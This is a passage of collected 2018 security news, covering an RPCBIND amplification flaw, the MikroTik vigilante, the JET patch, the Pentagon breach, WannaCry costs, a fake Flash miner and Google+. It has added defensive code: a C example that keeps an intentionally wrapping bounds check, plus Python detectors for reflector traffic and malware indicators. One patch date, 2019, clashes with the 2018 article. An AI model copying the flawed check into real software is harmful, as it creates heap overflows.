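Both ZDI advisories above describe the same root cause: guest-supplied values reaching a host-side heap buffer without proper validation. The block below is an added example, not VMware's or ZDI's code and not the SVGA or e1000 implementation; it is a hypothetical emulated-device FIFO handler (invented names such as `vdev_write_fifo`, `guest_cmd_t` and `VDEV_FIFO_SIZE`) that shows the kind of check a device model needs and the classic way such a check goes wrong when `offset + length` is computed in 32-bit arithmetic and wraps.

```c
/* Added example, not VMware's or ZDI's code: a hypothetical emulated-device
 * handler. A guest supplies an offset and a length for a copy into a host
 * heap buffer; the hardened check rejects out-of-range values, including
 * ones whose sum would wrap around. */
#include <stdint.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

#define VDEV_FIFO_SIZE 256u     /* hypothetical device FIFO size */

typedef struct {
    uint8_t *fifo;              /* heap-allocated, fifo_size bytes */
    size_t   fifo_size;
} vdev_t;

/* Guest-controlled command: every field comes straight from the VM and
 * nothing in it may be trusted. */
typedef struct {
    uint32_t       offset;
    uint32_t       length;
    const uint8_t *data;        /* guest memory already mapped by the host */
} guest_cmd_t;

vdev_t *vdev_new(void) {
    vdev_t *d = calloc(1, sizeof *d);
    if (!d) return NULL;
    d->fifo = calloc(VDEV_FIFO_SIZE, 1);
    if (!d->fifo) { free(d); return NULL; }
    d->fifo_size = VDEV_FIFO_SIZE;
    return d;
}

void vdev_free(vdev_t *d) { if (d) { free(d->fifo); free(d); } }

/* The mistake (kept only to show it, never use with guest input): the sum is
 * computed in uint32_t, so a large offset wraps and passes the comparison
 * while the later memcpy writes past the end of the heap buffer. */
bool unsafe_range_ok(uint32_t offset, uint32_t length, size_t size) {
    return (uint32_t)(offset + length) <= size;
}

/* Hardened check: compare against the remaining space, so nothing can wrap. */
bool range_ok(uint32_t offset, uint32_t length, size_t size) {
    return offset <= size && length <= size - offset;
}

/* Returns 0 on success, -1 if the command is rejected. */
int vdev_write_fifo(vdev_t *d, const guest_cmd_t *cmd) {
    if (!d || !cmd || !cmd->data) return -1;
    if (!range_ok(cmd->offset, cmd->length, d->fifo_size)) return -1;
    memcpy(d->fifo + cmd->offset, cmd->data, cmd->length);
    return 0;
}

int vdev_read_fifo(const vdev_t *d, uint32_t offset, uint32_t length, uint8_t *out) {
    if (!d || !out) return -1;
    if (!range_ok(offset, length, d->fifo_size)) return -1;
    memcpy(out, d->fifo + offset, length);
    return 0;
}

/* Self-check with constructed commands; returns 1 when every case behaves. */
int vdev_selftest(void) {
    static const uint8_t payload[4] = {1, 2, 3, 4};
    vdev_t *d = vdev_new();
    if (!d) return 0;
    guest_cmd_t ok   = { 252u, 4u, payload };            /* last four bytes: fine   */
    guest_cmd_t bad  = { 253u, 4u, payload };            /* one byte past the end   */
    guest_cmd_t wrap = { 0xFFFFFFF0u, 0x20u, payload };  /* 32-bit sum wraps to 0x10 */
    uint8_t out[4] = {0};
    int pass = vdev_write_fifo(d, &ok) == 0
            && vdev_write_fifo(d, &bad) == -1
            && vdev_write_fifo(d, &wrap) == -1
            && vdev_read_fifo(d, 252u, 4u, out) == 0
            && memcmp(out, payload, 4) == 0
            && unsafe_range_ok(0xFFFFFFF0u, 0x20u, d->fifo_size)  /* the bug lets it through */
            && !range_ok(0xFFFFFFF0u, 0x20u, d->fifo_size);       /* the fix rejects it      */
    vdev_free(d);
    return pass;
}
```

The `wrap` command is the case worth remembering: `0xFFFFFFF0 + 0x20` overflows to `0x10` in 32-bit arithmetic, so a check written as `offset + length <= size` accepts it, and the copy then starts far outside the buffer. Checking `length <= size - offset` after `offset <= size` needs no wider integer type and cannot wrap.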

The cloud computing and platform virtualization company also assigned this flaw a CVSS score of 6.9.

In June, the company fixed a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.


Brazil expert discovers Oracle flaw that allows massive DDoS attacks
17.10.2018 securityaffairs
Vulnerebility

Oracle has just released a security update to prevent 2.3 million servers running the RPCBIND service from being used in amplified DDoS attacks.
The flaw was discovered by the Brazilian researcher Mauricio Corrêa, founder of Brazilian security company XLabs. The exploitation of this vulnerability could cause major problems on the Internet.

“A proof of concept (POC) made in only one XLabs server generated a traffic of 69 gigabits per second,” Mauricio told Cibersecurity.net.br.

At the time of the discovery, the expert queried Shodan and found that there were nearly 2.6 million servers running RPCBIND on the Internet. The multiplication of this exploit in a 2.6 million server farm leads to a frightening conclusion.

RPCBIND ddos

RPCBIND is software that provides client programs with the information they need about server programs available on a network. It runs on port 111 and responds with universal addresses of the server programs so that client programs can request data through RPCs (remote procedure calls).

These addresses are formed by the server IP plus port. Since its launch, RPCBIND has received updates covering several flaws, including security ones. This, however, is the most serious finding so far.

The discovery of the flaw began on June 11 this year. On that day, one of the web application firewalls (WAFs) installed in the XLabs SOC (security operations center) detected an abnormal pattern of network traffic that caught Mauricio's eye.

The data showed that a DDoS attack was in progress, coming from port 111 of several servers, all from other countries.

“We then decided to open a server with port 111 exposed on the Internet, with the same characteristics as those that were attacking us, and we were monitoring that server for weeks. We found that it was receiving requests to generate attacks,” he explained.

After further analysis of the subject, it was possible to reproduce the attack in the laboratory.

“By analyzing the servers exposed at Shodan, the extent of the problem was confirmed,” continues Mauricio.
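A defender-side check for the pattern XLabs observed (many small requests to UDP port 111 and much larger replies going back out), as an added example that is not part of the original article: it reads flow records in a simple one-line text format (an assumption; map it onto your own NetFlow/IPFIX export) and flags (server, destination) pairs whose bytes-out to bytes-in ratio shows the server is being used as a reflector. All addresses and records are constructed.

```python
"""Spot servers being abused as RPCBIND (UDP/111) reflectors from flow records.

Added example, not part of the original article. The one-line flow format used
here is an assumption; map it onto your own NetFlow/IPFIX export. A reflector
receives many small requests on port 111 and sends much larger replies to the
(spoofed) source, so bytes-out divided by bytes-in per (server, destination)
pair is high.
"""
from collections import defaultdict
from dataclasses import dataclass

RPCBIND_PORT = 111


@dataclass
class Flow:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    nbytes: int
    npkts: int


def parse_flow(line: str) -> Flow:
    """Parse 'udp 203.0.113.7:4444 -> 192.0.2.10:111 40 1' (constructed format)."""
    proto, src, _arrow, dst, nbytes, npkts = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return Flow(proto.lower(), sip, int(sport), dip, int(dport), int(nbytes), int(npkts))


def find_reflectors(lines, min_ratio: float = 10.0, min_requests: int = 5) -> dict:
    """Return {(server, destination): amplification_ratio} for suspicious pairs.

    A pair is reported when the server answered at least min_requests packets
    on UDP/111 for that destination and sent at least min_ratio times as many
    bytes back as it received.
    """
    bytes_in = defaultdict(int)   # (server, dest) -> request bytes seen
    bytes_out = defaultdict(int)  # (server, dest) -> reply bytes seen
    requests = defaultdict(int)   # (server, dest) -> request packets seen
    for raw in lines:
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        flow = parse_flow(raw)
        if flow.proto != "udp":
            continue
        if flow.dport == RPCBIND_PORT:          # request towards the server
            key = (flow.dst, flow.src)
            bytes_in[key] += flow.nbytes
            requests[key] += flow.npkts
        elif flow.sport == RPCBIND_PORT:        # reply from the server
            key = (flow.src, flow.dst)
            bytes_out[key] += flow.nbytes
    suspicious = {}
    for key, out in bytes_out.items():
        if requests[key] < min_requests or bytes_in[key] == 0:
            continue
        ratio = out / bytes_in[key]
        if ratio >= min_ratio:
            suspicious[key] = round(ratio, 1)
    return suspicious


# Constructed records: 192.0.2.10 is our exposed rpcbind host, 203.0.113.7 the
# spoofed victim address, 198.51.100.5 a normal client doing a single lookup.
REFLECTED_PAIR = [
    "udp 203.0.113.7:4444 -> 192.0.2.10:111 40 1",
    "udp 192.0.2.10:111 -> 203.0.113.7:4444 1200 3",
]
SAMPLE_FLOWS = REFLECTED_PAIR * 6 + [
    "# proto src:sport -> dst:dport bytes packets",
    "udp 198.51.100.5:50123 -> 192.0.2.10:111 40 1",
    "udp 192.0.2.10:111 -> 198.51.100.5:50123 120 1",
    "tcp 198.51.100.5:50124 -> 192.0.2.10:22 3000 20",
]

if __name__ == "__main__":
    for (server, dest), ratio in find_reflectors(SAMPLE_FLOWS).items():
        print(f"{server} -> {dest}: {ratio}x amplification")
```

A single lookup from a legitimate client stays well under the ratio and request thresholds, so only the repeated, heavily amplified pair is reported.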

The problem discovered by Mauricio is worse than Memcrashed, detected in February of this year. In this type of distributed denial of service (DDoS) attack, the malicious traffic generated with the technique is greater than the one associated with the abuse of memcached, a service that does not require authentication but has been exposed on the Internet by inexperienced system administrators. That service runs on UDP port 11211, and its exploitation by cybercriminals has already generated 260GB of traffic according to Cloudflare's measurements.

After developing the POC, Maurício reported the problem to Oracle’s security team, since RPCBIND is a solution originating from Sun, which was acquired by the company in 2010.

He sent the information to Oracle so that the experts of the company could confirm and evaluate the problem. The confirmation arrived by email (see image), with the announcement of the publication date of the patch. It was on Tuesday, October 16, 2019 at 5:00 p.m., Brasília time, 1:00 p.m. in San Francisco, California.

The Brazilian version of the post is available on the author’s blog.


A Russian cyber vigilante is patching outdated MikroTik routers exposed online
15.10.2018 securityaffairs
Vulnerability

A Russian-speaking hacker, who goes by the name of Alexey, claims to have hacked into over 100,000 MikroTik routers with a specific intent: to disinfect them.
In early August, experts uncovered a massive cryptojacking campaign that was targeting MikroTik routers to inject a Coinhive cryptocurrency mining script into web traffic.

The campaign started in Brazil, but it rapidly expanded to other countries, targeting MikroTik routers all over the world; over 200,000 devices were compromised.

In September thousands of unpatched MikroTik Routers were involved in new cryptocurrency mining campaigns.

Threat actors also used exploit code for the CVE-2018-14847 vulnerability in MikroTik routers to recruit them into botnets such as Mirai and VPNFilter.

Alexey is a Russian-speaking cyber vigilante who decided to fix the MikroTik routers, and he claims to be a system administrator.

Alexey described his activity on a Russian blogging platform, where he explained that he hacked into the routers to change their settings and prevent further compromise.

“I added firewall rules that blocked access to the router from outside the local network,” Alexey wrote.

“In the comments, I wrote information about the vulnerability and left the address of the @router_os Telegram channel, where it was possible for them to ask questions.”

Alexey changed settings on over 100,000 routers, but only 50 users contacted him via Telegram, and some of them were angry about the intrusion.

According to the researcher Troy Mursch, there are currently over 420,000 MikroTik routers exposed online that have been abused in cryptocurrency-mining campaigns.

MikroTik routers continue to be under attack, and the situation is getting worse because of the availability of a new PoC code.

The new attack technique was recently discovered by experts at Tenable Research and it could be exploited by remote attackers to execute arbitrary code on the vulnerable devices.

The experts at Tenable Research presented the technique on October 7 at DerbyCon 8.0 during the talk “Bug Hunting in RouterOS”; it leverages a known directory traversal flaw tracked as CVE-2018-14847.


Just to be clear, although Alexey broke into the infected routers to sanitize them, his action is technically considered a cybercrime.

The bad aspect of the story is that even though security patches have been available for months, ISPs and owners of the home routers still have not installed them.


Microsoft fixed the Zero-Day for JET flaw, but the fix is incomplete
15.10.2018 securityaffairs
Vulnerability

Experts from 0Patch revealed that the Microsoft Zero-Day Patch for JET Database Engine vulnerability (CVE-2018-8423) is incomplete.
The vulnerability was discovered by the researcher Lucas Leong of the Trend Micro Security Research team, who publicly disclosed it as an unpatched zero-day affecting all supported versions of Microsoft Windows.

The flaw is an out-of-bounds (OOB) write in the JET Database Engine that could be exploited by a remote attacker to execute arbitrary code on the vulnerable systems.

The zero-day vulnerability has received a CVSS score of 6.8 and resides in the management of indexes in JET. An attacker can use specially crafted data in a database file to trigger a write past the end of an allocated buffer.

Experts highlighted that exploitation of the flaw requires user interaction; the attackers have to trick victims into opening a malicious file that would trigger the bug.

The specially crafted file has to contain data stored in the JET database format.

Lucas Leong reported the flaw to Microsoft in early May 2018; he expected it would be fixed with the September 2018 Patch Tuesday set of security updates, but Microsoft did not fix it.

“Today, we are releasing additional information regarding a bug report that has exceeded the 120-day disclosure timeline” stated the blog post published by ZDI.

“An out-of-bounds (OOB) write in the Microsoft JET Database Engine that could allow remote code execution was initially reported to Microsoft on May 8, 2018. An attacker could leverage this vulnerability to execute code under the context of the current process, however it does require user interaction since the target would need to open a malicious file. As of today, this bug remains unpatched.”

At the end of September, the 0patch community released an unofficial patch for the Microsoft JET Database Engine zero-day vulnerability disclosed by Trend Micro’s Zero Day Initiative.

Last week Microsoft addressed the flaw as part of its Patch Tuesday updates.

0patch has now issued another micropatch to correct the official Microsoft patch, which according to the experts is incomplete.

The root cause of the problem resides in the Windows core dynamic link library msrd3x40.dll.

“As expected, the update brought a modified msrd3x40.dll binary: this is the binary with the vulnerability, which we had micropatched with four CPU instructions (one of which was just for reporting purposes).” wrote Mitja Kolsek, a researcher with the 0patch team.

“The version of msrd3x40.dll changed from 4.0.9801.0 to 4.0.9801.5 and of course its cryptographic hash also changed – which resulted in our micropatch for this issue no longer getting applied to msrd3x40.dll.”

Experts pointed out that the official patch doesn’t fix the vulnerability, but only limits it. The micropatch works on fully updated 32-bit and 64-bit Windows 10, Windows 8.1, Windows 7, Windows Server 2008 and Windows Server 2012, as well as other Windows versions that share the same version of msrd3x40.dll.

“So we BinDiff-ed the patched msrd3x40.dll to its vulnerable version and reviewed the differences. At this point we will only state that we found the official fix to be slightly different to our micropatch, and unfortunately in a way that only limited the vulnerability instead of eliminating it.” continues Kolsek.

“We promptly notified Microsoft about it and will not reveal further details or proof-of-concept until they issue a correct fix.”

0patch reported the problem to Microsoft and plans to publish the official proof-of-concept code once the tech giant has fixed it.


Pentagon Defense Department travel records data breach
14.10.2018 securityaffairs
Incident

Pentagon – Defense Department travel records suffered a data breach that compromised the personal information and credit card data of U.S. military and civilian personnel.
The Pentagon revealed that the Defense Department travel records suffered a data breach that compromised the personal information and credit card data of U.S. military and civilian personnel.

The data breach could have happened some months ago and could have affected as many as 30,000 workers. Department leaders were notified of the breach on October 4.

“According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.” reads the post published by the Associated Press.

“The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.”


Lt. Col. Joseph Buccino, a Pentagon spokesman, said the Defense Department is still investigating the incident; the breach affected a still-unidentified commercial vendor that provided services to the Department.

“It’s important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population” of Defense Department personnel, said Buccino.

“The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel,” said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

The department is not identifying the vendor for security reasons; the vendor is still under contract, but the department “has taken steps to have the vendor cease performance under its contracts.”


NHS is still assessing the cost of WannaCry one year later
14.10.2018 securityaffairs
Ransomware

The UK’s Department of Health and Social Care provided an update on the efforts to secure the NHS IT infrastructure, with a focus on WannaCry overall costs.
The UK’s Department of Health and Social Care provided an update on the spending to secure the IT infrastructure in a report titled “Securing cyber resilience in health and care“. One year after the massive WannaCry ransomware attack, the NHS is still facing problems caused by the infections.


WannaCry cost the NHS £92m; the expense breakdown shows an item of £19m for lost output and an estimated £73m of IT costs to fix affected assets.

According to the report, the attack directly impacted over 19,000 patients whose appointments were canceled due to the attack.

The estimate in the report considers the financial costs in two time periods:

during the attack, between 12 and 18 May 2017;
during the recovery period in the immediate aftermath, through June-July 2017.

The analysis focuses on two categories of cost:

Direct impact – lost output of patient care caused by reduced access to the information and systems required for care, leading to cancelled appointments etc.
Additional IT support provided by NHS organisations or IT consultants to restore the data and systems affected by the attack.

“The WannaCry attack disrupted services across one-third of hospital trusts and around 8% of GP practices. This had a knock-on impact on patients with over 19,000 appointments cancelled.” reads the report.

“While this may only be a small proportion of overall NHS activity, it represents disruption to the care of a significant number of patients.”

The attack highlighted the inefficiency of the antiquated NHS IT systems; Microsoft was contracted to update the entire infrastructure under a three-year £150m deal.

The report includes a case study related to a “large NHS mental health trust” that was protected with Advanced Threat Protection, which allowed it to repel a phishing email attack carrying a weaponized Excel spreadsheet attachment.

IBM was also hired by the NHS to deliver the new Cyber Security Operations Centre (CSOC) aimed at increasing the capability to monitor, detect and respond to a variety of security risks and threats across the organization.

NHS signed a three-year strategic partnership with IBM (£30m) to improve NHS Digital’s Cyber Security Operations Centre (CSOC).

The goal is compliance with the Cyber Essentials Plus standard by June 2021, as recommended in February’s lessons-learned report.

Currently, only 10 sites will “aim” to reach this goal next March.


Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update
14.10.2018 securityaffairs
Virus

Security experts from Palo Alto Networks warn of a fake Adobe Flash update that hides a miner while behaving like a legitimate update and actually updating the software.
A fake Adobe Flash update was used as a vector for a malicious cryptocurrency miner; the novelty in this latest campaign is the set of tricks used by attackers to stealthily drop the malware.

The fake Adobe Flash update has been actively used in a campaign since this summer. It borrows code from the legitimate update and really updates the victims’ software, but it also includes code to download an XMRig cryptocurrency miner on Windows systems.

“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.

“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”


The fake Adobe Flash updates use file names starting with AdobeFlashPlayer that are hosted on cloud-based web servers that don’t belong to Adobe.

The downloads always include the string “flashplayer_down.php?clickid=” in the URL.

At the time of the report, it was still unclear how attackers were spreading the URLs delivering the fake Adobe Flash update.


Network traffic analysis revealed that the infected Windows hosts connect to osdsoft[.]com via HTTP POST requests. This domain was associated with updaters or installers pushing cryptocurrency miners.

“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.

“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”

Palo Alto Networks experts highlighted that potential victims will still receive warning messages about running downloaded files on their Windows computer.

“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.

“Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.”
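The indicators in the Palo Alto Networks report (the flashplayer_down.php?clickid= URL fragment, AdobeFlashPlayer-prefixed file names served from hosts that do not belong to Adobe, HTTP POST requests to osdsoft[.]com, and XMRig traffic on TCP port 14444) can be turned into a proxy-log check. The following is an added example, not code from the report: the log line format and sample records are constructed, and treating adobe.com and its subdomains as the only legitimate source is an assumption.

```python
"""Match the fake-Flash-update indicators from the report against proxy and
firewall log lines. Added example; the log format and sample records are
constructed for illustration."""
from collections import defaultdict
from urllib.parse import urlparse

# Indicators taken from the report (osdsoft[.]com is written defanged there).
DOWNLOAD_MARKER = "flashplayer_down.php?clickid="
FILENAME_PREFIX = "adobeflashplayer"
MINER_C2_DOMAIN = "osdsoft.com"
XMRIG_PORT = 14444
# Assumption: genuine Flash installers come from Adobe-owned hosts only.
ADOBE_DOMAINS = ("adobe.com",)


def _host_in(host: str, domains) -> bool:
    """True if host equals or is a subdomain of any entry in domains."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def http_indicators(method: str, url: str) -> list:
    """Return the indicator names that one HTTP request (method + URL) matches."""
    hits = []
    parsed = urlparse(url)
    host = parsed.hostname or ""
    if DOWNLOAD_MARKER in url.lower():
        hits.append("flashplayer_down-url")
    filename = parsed.path.rsplit("/", 1)[-1].lower()
    if filename.startswith(FILENAME_PREFIX) and not _host_in(host, ADOBE_DOMAINS):
        hits.append("fake-flash-filename")
    if method.upper() == "POST" and _host_in(host, (MINER_C2_DOMAIN,)):
        hits.append("osdsoft-post")
    return hits


def tcp_indicators(dst: str) -> list:
    """Return the indicator names for a raw outbound TCP connection 'ip:port'."""
    _host, _, port = dst.rpartition(":")
    if port.isdigit() and int(port) == XMRIG_PORT:
        return ["xmrig-port"]
    return []


def scan_log(lines) -> dict:
    """Map each client with at least one hit to its sorted list of indicators.

    Constructed line format: '<timestamp> <client-ip> <GET|POST|TCP> <url-or-ip:port>'.
    """
    findings = defaultdict(set)
    for raw in lines:
        parts = raw.split()
        if len(parts) != 4:
            continue  # malformed or unrelated record
        _ts, client, kind, target = parts
        if kind.upper() == "TCP":
            hits = tcp_indicators(target)
        else:
            hits = http_indicators(kind, target)
        findings[client].update(hits)
    return {client: sorted(hits) for client, hits in findings.items() if hits}


# Constructed sample log: 10.0.0.5 fetches an installer from an Adobe host;
# 10.0.0.9 shows the full fake-update chain described in the report.
SAMPLE_LOG = [
    "2018-10-12T10:01:02Z 10.0.0.5 GET https://get.adobe.com/flashplayer/AdobeFlashPlayer_31.exe",
    "2018-10-12T10:02:10Z 10.0.0.9 GET http://cdn-host.example/flashplayer_down.php?clickid=1a2b3c",
    "2018-10-12T10:02:11Z 10.0.0.9 GET http://cdn-host.example/files/AdobeFlashPlayer_31_setup.exe",
    "2018-10-12T10:03:00Z 10.0.0.9 POST http://osdsoft.com/update",
    "2018-10-12T10:03:30Z 10.0.0.9 TCP 203.0.113.20:14444",
    "2018-10-12T10:04:00Z 10.0.0.5 TCP 203.0.113.21:443",
]

if __name__ == "__main__":
    for client, hits in scan_log(SAMPLE_LOG).items():
        print(client, ", ".join(hits))
```

A client that matches several indicators in sequence (download URL, non-Adobe installer, POST to the updater domain, then port 14444) is a far stronger signal than any single hit, since the report notes the fake update also performs a real Flash update.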


Pentagon Reveals Cyber Breach of Travel Records
14.10.2018 securityweek
BigBrothers Incident

The Pentagon on Friday said there has been a cyber breach of Defense Department travel records that compromised the personal information and credit card data of U.S. military and civilian personnel.

According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.

The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.

According to a Pentagon statement, a department cyber team informed leaders about the breach on Oct. 4.

Lt. Col. Joseph Buccino, a Pentagon spokesman, said the department is still gathering information on the size and scope of the hack and who did it.

"It's important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population" of Defense Department personnel, said Buccino.


The vendor was not identified and additional details about the breach were not available.

"The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel," said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

Buccino said that due to security reasons, the department is not identifying the vendor. He said the vendor is still under contract, but the department "has taken steps to have the vendor cease performance under its contracts."

Disclosure of the breach comes on the heels of a federal report released Tuesday that concluded that military weapons programs are vulnerable to cyberattacks and the Pentagon has been slow to protect the systems. And it mirrors a number of other breaches that have hit federal government agencies in recent years, exposing health data, personal information, and social security numbers.

The U.S. Government Accountability Office in its Tuesday report said the Pentagon has worked to ensure its networks are secure, but only recently began to focus more on its weapons systems security. The audit, conducted between September 2017 and October 2018, found that there are "mounting challenges in protecting its weapons systems from increasingly sophisticated cyber threats."

In 2015, a massive hack of the federal Office of Personnel Management, widely blamed on China's government, compromised personal information of more than 21 million current, former and prospective federal employees, including those in the Pentagon. It also likely occurred months before it was discovered and made public, and it eventually led to the resignation of the OPM director.

Also that year, hackers breached the email system used by the Joint Chiefs of Staff, affecting several thousand military and civilian workers.

The Defense Department has consistently said that its networks and systems are probed and attacked thousands of times a day.


Industry Reactions to Google+ Security Incident: Feedback Friday
14.10.2018 securityweek
Social

Google announced this week that it has decided to shut down its Google+ social network. The announcement also revealed the existence of an API bug that exposed personal information from as many as 500,000 accounts.

According to Google, the flaw gave hundreds of third-party apps access to user information such as name, email address, occupation, gender and age. However, the Internet giant said it had found no evidence of abuse.

Google discovered the bug in March 2018, but waited until now to disclose it, which has raised a lot of questions. The Wall Street Journal reported that Google executives decided not to notify users earlier due to concerns it would attract the attention of regulators and draw comparisons to the Cambridge Analytica data privacy scandal that hit Facebook.


Industry professionals have commented on various aspects of the story, including the vulnerability, legal implications, impact on Google, and how APIs can be secured.

And the feedback begins...

Paul Bischoff, Comparitech:

"In my view, Google is basically pleading ignorance in order to shield itself from legal ramifications. It has conveniently left out some crucial figures in its response that would give us a more clear picture of the scope of this incident. For example, Google says 438 applications had unauthorized access to Google+ profile data, but it doesn't say how many of its users used those apps. And while Google says it performed a cursory investigation and found nothing suspicious, it also notes that it didn't actually contact or audit any of the developers of those apps.

As popular and high-profile as Google is, and due to the fact that this vulnerability existed for the better part of three years, it would be reasonable to assume the number of occurrences in which Google+ data was obtained and misused is non-zero.

Although there's no federal breach notification law in the US, every state now has its own breach notification law. However, these laws only apply when it's clear that data was obtained by an unauthorized third party. By turning a blind eye as to whether this occurred and only acknowledging that a vulnerability existed, Google can plead ignorance."

Ilia Kolochenko, CEO, High-Tech Bridge:

"Unlike the recent Facebook breach, this disclosure timeline is incomprehensibly long and will likely provoke a lot of questions from regulatory authorities. Inability to assess and quantify the users impacted does not exempt from disclosure. Although a security vulnerability per se does not automatically trigger the disclosure duty, in this case it seems that Google has some reasonable doubts that the flaw could have been exploited. Further clarification from Google and technical details of the incident would certainly be helpful to restore confidence and trust among its users currently abandoned in darkness.

Technically speaking, this is one more colourful example that bug bounty is no silver bullet even with the highest payouts by Google. Application security is a multi-layered approach process that requires continuous improvement and adaptation for new risks and threats. Such vulnerabilities usually require a considerable amount of effort to be detected, especially if they (re)appear on a system that has already been tested. Continuous and incremental security monitoring is vital to keep modern web systems secure."

Matt Chiodi, VP of Cloud Security, RedLock:

“Given Google's largely stellar reputation, I am shocked that they would purposefully choose to not disclose this incident. We have learned from similar situations that consumers possess a strong ability to forgive when companies take immediate and demonstrable steps to ensure their mistakes are not repeated. Think about J&J with the Tylenol scandal in the 1980s. Because of their swift response, J&J remains one of the most trusted brands. Google could lose a great deal of respect and ultimately revenue if this report is true.”

Bobby S, Red Team, ThinkMarble:

"The fact that Google chose to shut Google+ down on discovering this breach is telling of how serious it is. It appears that a bug in the API for Google+ had been allowing third-party app developers to access the data not just of users who had granted permission, but of their friends. The vast majority of social media platforms that we use every day monetise our data by making it available to 3rd parties via an API, but it is not acceptable that exploitative practices continue.

This has echoes of the Cambridge Analytica scandal that hit Facebook and has led to much greater scrutiny of Facebook’s policies and openness towards how data is accessed, used and shared. Similarly, Google must seriously consider how it continues to operate alongside third-party developers. This is especially relevant now that the GDPR is in force, affecting any company with users in the EU.

As a data controller, under Article 32 of the GDPR, Google now has greater obligations to ensure that its data-processors (including third-party app developers) implement measures to both ensure the security of personal data, but also gain the proper permissions from individual users to access it. In wake of this new regulation, these same companies also now hold a legal requirement to take appropriate actions to secure and pseudonymize this data before making it available through their services."

Pravin Kothari, CEO, CipherCloud:

“Google’s unofficial motto has long been ‘don’t be evil.’ Alphabet, the Google parent company, adapted this to ‘do the right thing.’

Google’s failure, if true, to not disclose to users the discovery of a bug that gave outside developers access to private data, is a reoccurring theme. We saw recently that Uber was fined for failing to disclose the fact that they had a breach, and instead of disclosing, tried to sweep it under the rug.

It’s not surprising that companies that rely on user data are incented to avoid disclosing to the public that their data may have been compromised, which would impact consumer trust. These are the reasons that the government should and will continue to use in their inexorable march to a unified national data privacy omnibus regulation.

Trust and the cloud do not go together until responsibility is taken for locking down and securing our own data. Even if your cloud offers the ability to enforce data protection and threat protection, it is not their data that is compromised and potentially used against them, it is the consumers.

Enterprises leveraging cloud services need to ensure additional security measures and data is protected before it is delivered to a third-party cloud service - this is the only way we can ensure data is protected.”

Colin Bastable, CEO, Lucy Security:

“Don’t be Evil mutated into Don’t be Caught. Google’s understandable desire to hide their embarrassment from regulators and users is the reason why states and the feds impose disclosure requirements – the knock-on effects of security breaches are immense.

The risk of such a security issue is shared by all of the Google users' employers, banks, spouses, colleagues, etc. But I guess we can trust them when we are told there was no problem.”

Etienne Greeff, CTO and co-founder, SecureData:

"The news today that Google covered up a significant data breach, affecting up to 500,000 Google+ users, is unfortunately unsurprising. It’s a textbook example of the unintended consequences of regulation – in forcing companies to comply with tough new security rules, businesses hide breaches and hacks out of fear of being the one company caught in the spotlight.

Google didn’t come clean on the compromise, because they were worried about regulatory consequences. While the tech giant went beyond its “legal requirement in determining whether to provide notice,” it appears that regulation like GDPR is not enough of a deterrent for companies to take the safety of customer data seriously. And so this type of event keeps on happening. While Google has since laid out what it intends to do about the breach in support of affected users, this doesn’t negate the fact that the breach – which happened in March – was ultimately covered up.

However, there are events that are happening far closer to home that aren’t getting the attention they deserve. We seem to pay more attention to the big tech breaches, when businesses such as the supermarket chain Morrisons are undergoing a class action lawsuit against them, for failing to protect deliberately leaked employee data. Last year the High Court ruled that the supermarket was what they termed “vicariously liable” as the Internal Auditor in question was acting in the course of his own employment at the company when he leaked that information online. The implications of this type of action are huge – if businesses can be held accountable for the actions of rogue employees acting criminally, then we will have to treat all our employees as malicious threat actors – which is a huge thing to consider and could have momentous repercussions across the globe in all industries.

Until then, we will undoubtedly see even more of this ‘head-in-the-sand’ practice in the future, especially given GDPR is now in force from larger tech firms. It ultimately gives hackers another way of monetising compromises – just like we saw in the case of Uber. This is dangerous practice, and changes need to be made across the technology industry to make it a safer place for all. Currently, business seems to care far more about covering its own back than the compromise of customer data. It’s a fine line to walk."

Bryan Becker, application security researcher, WhiteHat Security:

“Even giants can have security flaws. I’m sure the offices of Facebook breathed a collective sigh of relief today, as they’re pushed out of the headlines by a new privacy breach at competitor Google.

Breaches like this illustrate the importance of continuous testing and active threat modeling, as well as the attention that APIs require for secure development and least information/privilege principles. Companies like Google grow large and fast, and can have a problem keeping every exposed endpoint under scrutiny. No one person can possibly be aware of every use or permutation of a single piece of code or API, or microservice.

For organizations that already have a large architecture, knowing where and how to start evaluating security can be a challenge in and of itself. In these cases, organizations can benefit from active threat modeling – basically a mapping of all front-end services to any other services they talk to (both backend and frontend), often drawn as a flow-chart type of diagram. With this mapping, admins can visualize what services are public facing (as in, need to be secured and tested), as well as what is at risk if those services get compromised. In some ways, this is the first step to taking ‘inventory’ in the infosec world.

Once the landscape is mapped out, automated testing can take a large portion of the strain by continuously scanning various services – even after they become old. Of course, automated testing is not a be-all/end-all solution, but it does carry the benefit that old or unused-but-not-yet-retired services continue to have visibility by the security team, even after most of the engineering team is no longer paying attention or has moved onto more interesting projects.”

Jessica Ortega, website security analyst, SiteLock:

